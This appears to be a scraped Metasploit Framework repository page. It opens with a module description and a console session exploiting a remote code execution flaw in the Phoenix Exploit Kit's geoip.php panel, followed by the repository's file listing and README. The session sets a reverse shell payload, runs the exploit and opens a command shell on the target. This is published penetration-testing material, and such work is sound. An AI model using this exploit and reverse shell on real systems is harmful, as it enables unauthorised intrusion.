d4c82868de
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware. ``` msf exploit(phoenix_exec) > show options Module options (exploit/multi/http/phoenix_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.52.128 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /Phoenix/includes/geoip.php yes The path of geoip.php which is vulnerable to RCE VHOST no HTTP server virtual host Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.52.129 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Phoenix Exploit Kit / Unix msf exploit(phoenix_exec) > check [+] 192.168.52.128:80 The target is vulnerable. msf exploit(phoenix_exec) > exploit [*] Started reverse TCP double handler on 192.168.52.129:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo RZpbBEP77nS8Dvm4; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "RZpbBEP77nS8Dvm4\r\n" [*] Matching... [*] B is input... [*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400 uname -a Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux ``` |
||
|---|---|---|
| .github | ||
| app | ||
| config | ||
| data | ||
| db | ||
| documentation | ||
| external | ||
| features | ||
| lib | ||
| modules | ||
| plugins | ||
| script | ||
| scripts | ||
| spec | ||
| test | ||
| tools | ||
| .gitignore | ||
| .gitmodules | ||
| .mailmap | ||
| .rspec | ||
| .rubocop.yml | ||
| .ruby-gemset | ||
| .ruby-version | ||
| .simplecov | ||
| .travis.yml | ||
| .yardopts | ||
| CODE_OF_CONDUCT.md | ||
| CONTRIBUTING.md | ||
| COPYING | ||
| Gemfile | ||
| Gemfile.local.example | ||
| Gemfile.lock | ||
| HACKING | ||
| LICENSE | ||
| README.md | ||
| Rakefile | ||
| Vagrantfile | ||
| metasploit-framework.gemspec | ||
| msfbinscan | ||
| msfconsole | ||
| msfd | ||
| msfelfscan | ||
| msfmachscan | ||
| msfpescan | ||
| msfrop | ||
| msfrpc | ||
| msfrpcd | ||
| msfupdate | ||
| msfvenom | ||
README.md
Metasploit 
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from: https://metasploit.com
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing
Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Metasploit
Metasploit can do all sorts of things. The first thing you'll want to do
is start msfconsole, but after that, you'll probably be best served by
reading Metasploit Unleashed, the great community
resources, or the wiki.
Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.